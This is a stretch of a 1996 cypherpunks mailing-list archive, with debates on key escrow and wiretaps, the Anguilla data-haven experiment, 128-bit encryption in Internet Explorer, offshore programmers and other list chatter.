BD> clip $100K of coupons, tax free, to pay for his kid's education.

BD> While I'm sure Steve Forbes could, I can't think of a moral
BD> argument why income from selling stock should be taxed at a rate
BD> lower (or higher) than than income from wages.

	Because, when you work harder (or more), you are (presumably)
producing more and adding to the economy.  When you leave money in an
inefficient investment, you aren't.  Of course, this is all based on
the premise that income taxes are moral in the first place. (;

-- 
#include <disclaimer.h>                               /* Sten Drescher */
ObCDABait:      For she doted upon their paramours, whose flesh is as the
flesh of asses, and whose issue is like the issue of horses.  [Eze 23:20]
Unsolicited solicitations will be proofread for a US$500/KB fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 15 Aug 1996 03:12:55 +0800
To: Jüri Kaljundi <fstuart@vetmed.auburn.edu>
Subject: Re: [SIGNAL] Microsoft's Internet Explorer
Message-ID: <v02120d0dae379f5d9e93@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:22 8/14/96, Jüri Kaljundi wrote:
> Wed, 14 Aug 1996, Frank Stuart kirjutas:
>
>> According to C-Net Radio (http://www.cnet.com/), Microsoft will be including
>> 128-bit SSL encryption in their Internet Explorer 3.0 for Win 95 and NT 4.0.
>
>As M$IE 3.0 is now available for download from www.microsoft.com, I did
>notice there is also a 128-bit version there, which requires you to first
>fill in data about you. Unfortunately microsoft.com is so slow right now,
>that I did not have a chance to try to download 128-bit version by filling
>in my favourite US politicians name.

I don't see the 128 bit version. URL?



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 15 Aug 1996 03:06:53 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Anguilla...etc.
In-Reply-To: <ae36aa4d09021004cad4@[205.199.118.202]>
Message-ID: <1VHNsD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> At 3:25 AM 8/14/96 Moscow Time, Dr.Dimitri Vulis KOTD wrote:
> >"Greg Kucharo" <sophi@best.com> writes:
> >>   While Tim may be right that nobility is lost when backing down to the
> >> authorities, the fact is that this game has little to do with noble
> >> purposes. ...
> >
> >Nor was there any activity from the authorities.
> >
> >A while back, when Vince first started advertizing his site, I asked him a f
> >hypothetical questions, and he said roughly this: If client X posts somethin
> >to Usenet from Vince's site, and if Y dislikes X's article so much that he
> >mailbombs X, then Vince would pull X's plug. (I have the exact quote saved.)
> >I lost interest right then. I'm not surprised that Vince acted dishonorably
> >pulling a client's plug with no warning for a very flimsy reason.
>
> "Acted dishonorably"?
>
> Really, Dimitri, are all Russians this rude? (Seeing the battles on Usenet
> between the "Sovoks" and the "Gruborbots," I'm beginning to think so.)
>
> While I think the Anguilla situation is an interesting one to analyze, I
> avoid such loaded terms as "dishonorable."

If you don't see why Vince's actions are dishonorable (and, by the way, far
ruder than anything anyone could say on any mailing list), then there's
no sense in my wasting time to explain it to you.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 15 Aug 1996 04:11:16 +0800
To: Arun Mehta <cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption   Technology
Message-ID: <199608141547.IAA25312@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:33 13/08/96 -0700, James A. Donald wrote:
> > the fact that an engineer who is subject to the power of the Indian
> > government is not worth very much, as is demonstrated by the fact
> > that companies with Indian engineering teams often spend a lot of money
> > to get their employees out of India.
> > 
> > Demand for Indian programmers is less than supply not because capital
> > has somehow failed to flow to India, but because an engineer in India
> > is not free to produce the value that engineers elsewhere are free
> > to produce.

At 07:00 PM 8/14/96 +0600, Arun Mehta wrote:
> Whoa! In economies that are highly de-coupled, incomes and prices
> can easily find quite different equilibria.

So?  What does this have to do with the price of fish?

Are Informix campuses "highly decoupled economies".

The fact is a company like Informix has a campus in India, and
it has campuses in the US that are largely staffed by Indian teams,
and it will pay big bucks to get its people out of India, even
though it has to pay them more than ten times as much in the US.

An Indian programmer doing the same job for the same company is
more than ten times as valuable to that company if he is not 
subject to the power of the Indian government, as proven by that
companies actions.

Plainly Informix does not like the power of the Indian government,
which is no surprise as a few years ago just about every company on
earth utterly detested the power of the Indian government and would
not touch the place with a ten foot pole.

> India has its faults,
> but it still is a relatively democratic and free country.

Under democracy, people get the government they deserve and 
get it good and hard.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 15 Aug 1996 03:46:11 +0800
To: Matt Blaze <mab@research.att.com>
Subject: Re: key escrow idea from David Satelin of MIT Lincoln Labs
Message-ID: <199608141555.IAA00344@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:48 AM 8/14/96 -0400, Matt Blaze wrote:

>>Remember, since the phoneco has had no competition, they've never been at 
>>risk from being shunned by customers who object to this secret cooperation.  
>>A more "realistic" position, I think, would be to conclude that if there was 
>>true competition, customers would be able to negotiate varying levels of 
>>non-cooperation in order to win customers.  I suspect that post-Ruby 
>>Ridge/post-Waco, there would be a substantial fraction of the public who 
>>would conclude that it cannot trust its own government.
>>
>
>Well, I don't know what went on before 1968, but these days phone companies
>don't keep wiretap orders secret because they are being nice to the police,
>they keep them secret because the court order for the weretap also orders
>them to.  Perhaps you aren't aware of this, but when a third party  is
>ordered to turn over records or access to something, the order often
>includes a provision that prohibits them from revealing the order to the
>subject.  This is not unique to phone records; orders for bank records
>frequently have secrecy provisions as well.

Well, that's just the problem.  These are clear violations of the 1st 
amendment.  The law may authorize a search, but the Constitution is supposed 
to limits them to "reasonable" ones.  And it says nothing about _secret_ 
ones, either.   The effectiveness of the search itself can't possibly be 
compromised by releasing the fact of the search AFTER it occurs, which means 
that the inclusion of such a secrecy order can't even conceivably be 
supported under the US Constitution.

 Think of this as a two-pan balance:  On the one side is the 1st amendment, 
a very important issue.  One the other side is...nothing.  Or, perhaps more 
accurately, no _constitutional_ issues.  Remember, the Constitution does not 
guarantee the effectiveness of the  entire investigative process; it merely 
addresses one portion of it, the search. (and even there, it doesn't 
guarantee a successful search!)   If the government claims that the process 
is crippled by releasing the fact of the search, then I'm afraid that this 
is not an adequate reason to violate free-speech rights.  (When the famous 
Miranda warning decision was made by the Supreme Court, cops said that it 
would cripple their investigations.)

You may say, of course, "that's not how they currently interpet it," but my 
response is simple:  Any talk of tolerating any sort of key-escrow (GAK) 
system must presume that the people running it are no more honest than they 
are today.  If the cops (and the government in general) so generously 
misinterprets the government's "rights" with regard to wiretapping, there is 
simply no reason to believe that any restrictions they claim to be willing 
to respect now will actually be followed once such a plan is approved.  
Don't try to get out of this:  You can't ignore past abuses.  And if they 
were willing to do illegal taps before 1968, this tells you how inclined 
they are to obey the law.

We've been handed an opportunity:  The government wants to change its 
wiretap powers, and unlike previous times the public is actually aware of 
what's happening and can object.  I think we must take this opportunity to 
entirely re-think the search-warrant/wiretap process.  Rather than blindly 
accept the opinions of crooked judges who got where they are by 
demonstrating their willingness to "get along by going along,"  we should 
strip away all the decades of scheming, and delete the entire process.

My opinion is that wiretaps are, inherently, unreasonable searches within 
the meaning of the Bill of Rights. Interestingly, support for this 
interpretation was shown when the media stated that Japan's Constitution 
prohibited wiretapping.  This was portrayed as being somewhat of an oddity.  
But in reality, that Constitution was forced on Japan after WWII, by the US. 
 Curiouser and curiouser, that happened during a time frame (pre 1968) in 
which wiretapping was illegal in the US, and probably believed to be 
unconstitutional as well.  Since the US Constitution hasn't changed since 
then, at least with respect to searches, the only realistic conclusion is 
that the thing that's changed is the interpretation of the US Constitution, 
and not for any sound reasons either.  (That Japanese Constitution, 
apparently not subject to such convenient re-interpretation, stands as it 
was when adopted, at least on this one issue.)

In fact, the timing for this change is suspicious:  1968 was certainly a 
rather tumultuous year, what with anti-Vietnam war protests, assassinations 
and such.  Not only in the US, but even more so in France, with the student 
riots.   The motivation to adopt an unconstitutional wiretapping law must 
have been substantial.  And given the fact that public polls on the concept 
of wiretaps repeatedly show it to be opposed by a majority of the 
population, I think the burden of proof is on the Denning-types to show that 
they're appropriate.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "The Prisoner (tm)" <void@null.net>
Date: Thu, 15 Aug 1996 04:19:40 +0800
To: cypherpunks@toad.com
Subject: Crypto Ban Talk @ G-7
Message-ID: <32120058.66B2@null.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, even tho Tim's language was hypothetical here's this item.  Was 
some of this on the cpunks and I missed it?  Very possible, & if so, 
sorry.

===============================================[quote:]=================


In article <X6k0RD1w165w@tanda.on.ca>, marc@tanda.on.ca (Marc Thibault) 
wrote:

>     I picked up a rumor that the G-7 has endorsed a resolution calling
>     for international cooperation to control private encryption. Does
>     anybody have solid information?
>

They've been discussing it. The US and some others want it. The Japanese
and one other country won't go along. So far, talk but no action. Stay
tuned.

David [Sternlight that is  ....]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Thu, 15 Aug 1996 02:24:11 +0800
To: cypherpunks@toad.com
Subject: Re: 2600 (the magazine)
Message-ID: <2.2.32.19960814143736.0036474c@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 12:27 AM 8/14/96 -0500, Jim Choate <ravage@einstein.ssz.com> wrote:

>The current issue of 2600 is out. I bought mine at Barnes & Nobles.
>
>It has a couple of articles on cryptography as well as a port scanner
>program for Linux.

I browsed the article on "cryptography" briefly on Monday.  I think using
the term "cryptography" to describe it is a bit strong.  The author is
encouraging people to basically XOR data with a repeating key (a modified
Vigniere) and then proclaims it forever unbreakable.

I was somewhat unimpressed.

"Why the hell doesn't Janet Reno outlaw this kind of irresponsible magazine?
They're showing KIDS how to encrypt data, for God's sake!"

Actually, one of us (he says, ducking the responsibility personally) should
probably write an article for them on how to use PGP.  (Maybe something that
doesn't use words bigger than "warez".)  I got it!  A one pager.  Paragraph
one gives the URL to Joel's PGP QuickStart (a description and a link is on
Joel's tools page at http://www.eskimo.com/~joelm/tools.html and the
executable itself is at ftp://ftp.eskimo.com/u/j/joelm/Install.exe [plug
plug]) and says, "run this program to install PGP."  The rest of the page
can be devoted to "how to hide your kewl viruses from your clueless teachurz".

Hmm.  Maybe I will write that article.  After all, they give out a free
subscription to authors (and since I buy the rag anyway) it might be worth
it.  But if someone wants to beat me to it, go for it.  I feel my ambition
slipping steadily away, and I haven't even got out of the e-mail phase
yet...  :-)

John
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 15 Aug 1996 04:40:46 +0800
To: Jim Legg <legg@sun1plus.liebert.com>
Subject: Re: Schlafly on crypto
In-Reply-To: <9608141523.AA02130@sun1plus.liebert.com>
Message-ID: <Pine.SUN.3.91.960814093658.5845D-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 14 Aug 1996, Jim Legg wrote:

> Beware when politicos speak!

Good advice, but...
 
> Phyllis Schlafly would think nothing of trying to ban speech on
> the internet when it is something that she doesn't agree with.

An interesting allegation.  I wonder if it is merely rhetoric or
if Jim has any evidence to backup this statement?

Does Jim know who Phyllis' son is?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 15 Aug 1996 04:59:47 +0800
To: cypherpunks@toad.com
Subject: Re: Schlafly on crypto
In-Reply-To: <9608141523.AA02130@sun1plus.liebert.com>
Message-ID: <199608141648.JAA22874@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> Beware when politicos speak!

> Phyllis Schlafly would think nothing of trying to ban speech on the
> internet when it is
> something that she doesn't agree with.

Horrors.  I'm agreeing with Phyllis Schlafly. 

I know I'm going to kick myself tomorrow for saying this, but I found
that to be a very nice rant against Big Brother in many of its 
manifestations.  

Of course, we still have Little Brother (the family),
and Cousin Elmer (the Church), but isn't it nice to see that 
the RRR is on our side on such an important issue. 

Way to go Phyllis! :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Aug 1996 06:05:44 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla - A DataHaven?
Message-ID: <ae374e570c02100454e7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Vince Cate has written several things in the past couple of days about the
situation in Anguilla; actually, I think we've learned more about the
operation of his service in the last few days than we have in the past year
or so. Some  instructive points, and some worries.

This message contains:

* discussion of the situation Vince describes

* what I surmise to be some of the behind the scenes realpolitik

* the role of physical vs. cyberspace data havens


Rather than respond point by point to one of Vince's messages, I'll first
make a few general points, free-form:

1. As I have said, I admire what Vince has done. Evolutionary learning
can't happen without experiments and tests, so his experiment is important.

2. If Vince ends up moving in a direction different from that of operating
a traditional (!) data haven, I will not be very surprised. Were I in his
position, I might well do the same thing. (Lots of reasons, issues....)\

3. Vince seems to be a in a somewhat precarious position, awaiting renewal
of a one-year work permit. In any country, this is a shaky basis for
continuing a project. I certainly don't know what his relationship is to
the local authorities, but I sure know I'd feel constrained if I were up
for renewal like this. (Consider how the U.S. refuses to renew visas for
"undesirables," including writers whose writings the establishment
dislikes, AIDS activists, anarchists (!!!), etc.)

4. The small size of Anguilla--I surmise and feel--works against operating
the kind of "data haven" many of us feel could exist. Given that data
havens will have all sorts of unusual, undesirable, and subversive
materials, this "small community" will probably react unfavorably to any
publicity generated. (And it's in the nature of some of these customers to
"advertise" themselves flamboyantly--unlike Swiss banking--so as to
generate customers...this pretty much guarantees that there will be stories
like "Anguilla--New Source for Neo-Nazi Material!")

5. In the U.S., there are 250 million people, extensive support networks
for protecting free speech (much as we like to focus on the suppression
cases), and a legal system that really does make it pretty hard for a
bureaucrat or even the President to pick up a phone and have a business he
doesn't like shut down. I surmise, given the size of Anguilla and the
non-constitutional basis of its government, etc., that it _might_ be a lot
easier for a bureaucrat or the Governor-General, or whomever, to seriously
disrupt any business by a few phone calls. I don't know this for a fact,
but I suspect it to be true.

(The closest I've been to Anguilla is the Bahamas, and it is reported to be
seriously corrupt. I can't imagine a data haven surviving there if the
Ruling Families decided they didn't like it.)

6. So, what does this mean? It means, I believe, that small Carribbean
islands are likely to be poor choices for data havens. The more "civilized"
they are, ironically, the poorer a choice they are. (Think: pirate islands,
where "anything goes," so long as the right payoffs are made.)

7. Multidimensionality. With banking havens, there is basically only a
single degree of freedom to consider, at least insofar as deciding which
policies to consider. That is, over a period of many decades a banking
industry arises in some country (Switzerland, Austria, Lichtenstein, etc.),
with bankers, vaults, protocols for deposit and withdrawal, etc. And with
lots of fees to lubricate the whole system, provided payoffs to various
officials and royals, etc. Contrast this with a small data haven (a new
industry) in a small country, with operating margins that are razor-thin
(given the pricing structure Vince announced, I doubt Taxbomber and other
customers were paying enough to ensure a flow of payoffs to the Ruling
Families of Anguilla and the various officials that need to look the other
way).

8. That is, how will a data haven handle situations where diverse "threats"
and "abominations" are traced to the haven? Bomb information, pornography,
child porn, trade secrets, pyramid schemes, and so on? (Vince can of course
say to each of these: "Not what I want," but he may find that such ad hoc
declarations chase away most of his business...)

9. In summary, I applaud Vince's experiment. But I wouldn't call it a data
haven, based on what I've seen. Maybe a tax haven, but even this I have yet
to see much evidence for (Vince is not free to disclose who his customers
are, of course, so we are somewhat isolated.). I will say that if the only
goal is to avoid sales tax and/or income taxes, operating out of Anguilla
may not be ideal. After all, suppose there's a dispute (a la Taxbomber): is
one supposed to fly to Anguilla, hire local attorneys, and sue in the local
courts? The tens of thousands of dollars this would cost would likely swamp
any tax savings.....depends on a lot of factors, but I think you all see
the point.

Well, I've written enough. Vince asked me a few specific questions, so I'll
briefly answer:

>Tim, we would all be very happy if you were to locate a country that could
>be the site of the ideal datahaven, and finance a couple cypherpunks to
>setup there.  It would be a big help to our cause.  Could you do this?

Yes and no. Yes, if a good business opportunity presented itself, with
reasonable payback, good ideological basis, and without too many
entanglements (e.g., having to fly to Country A to check on my investment
too often). No, in that there is no "liquid market" in such investment
opportunities. That is, I can't just say "Send me your plans and how much
money you want." I might consider partly funding a venture by people
well-known to me, but, so far, no such possibilities have presented
themselves.

>In the mean time, people may have to exist in cyberspace (like
>www.taxbomber.com) without having a totally secure physical location.
>This is not the end of the world, or really even that painful.  If done
>right you could be down for only an hour - just long enough for
>nameservers to change.  Taxbomber is now setup to do it very fast next
>time, if the need ever comes.  Tim, I think you have even advocated this
>approach, not stressing the physical location, just the cyberspace
>location.  No?

Yes, I agree. I actually wrote my "Crypto Anarchist Manifesto" in mid-1988,
just a month or so before reading Sterling's "Islands in the Net," which
was focussed on physical data havens (he may've been the one to coin the
term, actually). My thinking was already heavily influenced by Vinge's
"True Names," and Chaum's work on untraceable digital cash (1985) was
well-known to me (for reasons I've written about elsewhere), so I tended to
view data havens as not being tied to physical communities where the local
potentates could revoke work permits, visas, travel permits, business
licenses, etc.

The Anguilla Experiment is certainly not changing this opinion.

(And Stephenson's "Snow Crash." in 1992, further popularized this vision of
cyberspace havens....I can't say he devised any new forms that some of us
hadn't already been thinking about, but he sure did make it a more vivid
vision through his evocative fiction.)

What the form of these "cyberspace data havens" might take is unclear.
Several pieces of technology are missing, just as they were missing four
years ago when one of the early list members contacted me to tell me how
easy it would be to set up a data haven with computers. (It wasn't easy
then, and it ain't easy now. The pieces that are missing are the
reifications of protocols we talk about a lot....mere encryption and
authentication are only the starting points, and look at how hard it's been
just to get _them_ deployed.)


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 15 Aug 1996 02:31:10 +0800
To: vince@offshore.com.ai (Vincent Cate)
Subject: Re: Passports - "fake" vs "counterfeit"
In-Reply-To: <Pine.LNX.3.91.960814070828.12021A@offshore>
Message-ID: <199608141447.KAA04659@nrk.com>
MIME-Version: 1.0
Content-Type: text


I'm confused here.

Vince runs a system.
A user did something Vince's attorney said might be a no-no.
Vince pulled the plug.
Tim objects.

Right?

I suggest the cure is a law, to keep Vince from booting
people off his system without due process.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Thu, 15 Aug 1996 03:04:22 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Citation for NSA Type III & IV Crypto products
Message-ID: <Pine.SCO.3.93.960814103710.12800A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


C'punks:

Most who are familiar with the Fed's crypto products are aware that the
NSA categorizes crypto products by "type."  Type I is specified as being
for classified protections (and relying upon classified key) and Type II
being for SBU/other (with unclassified-only key).  I recall, however, that
there were also categories called Type III and Type IV.  I think that Type
III had to do with industry use, with Government-generated key.  Type IV I
can't recall at all.  Now, I can't find the citation where these things
were described.  The EPL cites only Type I & II, Dockmaster has proven of
no use, and the search engines can't find anything on the Net. 

Does anyone recall where a discussion of these types can be found?

TIA.

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Aug 1996 05:59:38 +0800
To: cypherpunks@toad.com
Subject: Non-U.S. programmers working for Sun and Informix
Message-ID: <ae375e9800021004711c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:49 PM 8/14/96, James A. Donald wrote:

>The fact is a company like Informix has a campus in India, and
>it has campuses in the US that are largely staffed by Indian teams,
>and it will pay big bucks to get its people out of India, even
>though it has to pay them more than ten times as much in the US.
>
>An Indian programmer doing the same job for the same company is
>more than ten times as valuable to that company if he is not
>subject to the power of the Indian government, as proven by that
>companies actions.

My hunch is that a much stronger reason for Informix to want to get its
programmers out of India and closer to its other U.S. programmers has to do
with what Coase called "the nature of the firm."

Friends of mine at Sun have reported to me on the severe problems they are
having with their very inexpensive to hire Russian programmers. The hope
had been that there were legions of well-trained, eager programmers and
mathematicians who could be hired for, say, a few bags of cat food. Sun,
like other companies, set up satellite operations in Russia and farmed-out
various projects.

What they're finding is that the programmers are reasonably well-trained
(and may be much better trained than most U.S. programmers, at least in
some areas...not too many CS majors in the U.S. know  what a Lebesgue
integral is, for example). However, their work is unacceptable, for various
reasons. Sun has taken to bringing over the programmers for a stay in the
U.S in order to acculturate them, innoculate them, whatever you wish to
call it, in the ways of Sun and of other American high tech companies. So
far, it isn't clear if the experiment can be salvaged.

Now certainly part of this is just the "remote control" problem, that of a
bunch of people off on their own at the end of a very long feedback loop.
Phone calls help, code reviews help, video conferencing helps, but perhaps
not enough.

And since the difference between a "mediocre" programmer and a "great"
programmer can far, far exceed any slight savings in salary, the incentives
are clear: hire locals who can work locally, or bring offshore programmers
to the local facility.

I suspect Sun's experiences with Russians are pretty similar to Informix's
experiences with Indians, with Tata Institute replacing Moscow State.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Thu, 15 Aug 1996 02:38:17 +0800
To: cypherpunks@toad.com
Subject: Another CP Meeting request
Message-ID: <199608141457.KAA29438@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Wed Aug 14 10:54:01 1996
Anyone Interested in a DC Metro meeting ?? ( VA, MD, DC )

> The South Florida Cypherpunks will meet at Hops Grill & Bar
> in Boynton Beach, FL on Saturday, August 17 at 2:00 PM.  As
> always, our meeting place is at a microbrewery, and this one
> has some very fine brews.

Is there anyone who would be interested in a Paris(France) cpunks
 meeting?

Ben.
____
Ben Samman.................................................ben@edelweb.fr
Paris, France                      Illudium Q36 Explosive Space Modulator




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMhHoi+J+JZd/Y4yVAQHM3AQMDkTqRIAigy6G5GggdRaXrlBpQrypoXJV
sbODRhUFxeP5+mHONfIIntyT+2AO7bW7RA+nSBMF6b/wNT779fGQ2/dZ7rPTzeAL
Ob9ltsTr1tdf0T9zMmM+szZER9qJ9bGQ8w6tCektO+BbuV3x/OCwBXAzFS5t1yax
1w1A2+Z9dViyVw==
=88D0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Thu, 15 Aug 1996 05:53:21 +0800
To: "Deana Holmes" <mirele@sybase.com>
Subject: Re: Another thing the Net is being blamed for...
Message-ID: <9608141812.AA15373@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


At least we didn't sue every ISP
ala CoS.  Also, I don't think he was "blaming"
the Internet neccessarily... It's been published 
in books before.

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: mirele @ xmission.com ("Deana Holmes") @ smtp
Date: 08/09/96 06:52:44 PM
Subject: Another thing the Net is being blamed for...

Yet another thing that we're being blamed for.  

FYI, the temple ceremony has been reproduced many times since it was 
first exposed in the 1840s.  The most recent revision (1990) was kept 
secret for only a short time before notorious former members got 
ahold of a tape and transcript of the ceremony.  (I have a good idea 
of how they got it.)  As far as I can tell, it didn't actually make 
it on to the Net until about 1994.

This particular Mormon churchman (Russell Ballard) gave a speech a 
year or so ago warning Mormons in vague terms about the evils of the 
Internet.  I suppose this is part of it.

=====

>From this morning's Rolley&Wells column in the Salt Lake Tribune (without
permission):

   "During a press tour this week of the LDS [Mormon] Church's new Mount
Timpanogos Temple in American Fork, a member of the news media asked
why a writtem copy of the temple ceremony was not given to members
with temple recommends so they could study it in the privacy of their
homes.
   Elder M. Russell Ballard of the Quorum of the Twelve Apostles
informed the reporter that there was no need. A church member had
'broken the covenant' -- taped the ceremony, transcribed it, and put
it on the Internet for all to read."

<end>

Deana M. Holmes
April 1996 poster child for clueless $cientology litigiousness
alt.religion.scientology archivist since 2/95
mirele@xmission.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 15 Aug 1996 03:04:57 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB88FA.42D3D100@groningen16.pop.tip.nl>
Message-ID: <199608141517.LAA21122@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bart Croughs writes:
> If you still don't understand this, I suggest you study my other
> posts on this subject, or better still, you study the works of the
> Austrian economists I've quoted before.

I'm reminded of a wonderful scene from "A Fish Called Wanda" (pardon
the inexactitude of the quote):

"Idiots don't read philosophy."
"Sure they do. They just don't understand it."

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 15 Aug 1996 05:40:35 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla - commercial and mailbombing policies
In-Reply-To: <Pine.LNX.3.91.960814073103.12075A-100000@offshore>
Message-ID: <JsPNsD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Vincent Cate <vince@offshore.com.ai> writes:

> 
> Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com>
> > 
> > A while back, when Vince first started advertizing his site, I asked him
> >a few hypothetical questions, and he said roughly this: If client X posts
> >something to Usenet from Vince's site, and if Y dislikes X's article so
> >much that he mailbombs X, then Vince would pull X's plug. (I have the
> >exact quote saved.) I lost interest right then. I'm not surprised that
> >Vince acted dishonorably by pulling a client's plug with no warning for a
> >very flimsy reason. 
> 
> That question was about commercial ads, and I said "As long as I am not
> mailbombed I don't care about how you post.".  I did *not* say I would
> pull the plug (full exchange below).  From your other questions it looked
> like there was no chance of you being a customer so I did not fully
> explain. 

This is known as "creative editing". No, my question was not about "commercial
spam", but about controversial Usenet posts in general. Since you seem to have
my original e-mail, you have my permission to quote it in full.

> If mailbombed then it goes toward your traffic.  You get 100 MB/month of
> traffic with a domain name, and if you go over that amount of traffic the
> cost is $1/MB.  If you have prepaid by check, and I don't know who you
> are, and your account goes below $0, I would cut you off till more money
> came in. 

I happen to be the owner of severallisteerv mailing lists, one of which is
fairly active. A few days ago someone forged subscription requests to all
three lists from a dozen notable personalities, including John Markoff,
Joshua Quittner, Emmanuel Goldstein (Eric Corley), et al. My understanding
is they were subscribed to several hundred mailing lists and some of them
had their mailboxes filled up.

It takes very little effort to send someone 200MB of e-mail these days. I
think I got several times that last time I got mailbombed by Nikki Sandru.
Do you customers realize they they might suddenly owe you hundreds of
dollars for the receipt of junk e-mail sent by some prankster?

This is another proof that Vince is a dishonorable man. An hnorable sysadmin
would protect his users from mailbomb attacks and make sure they are junked
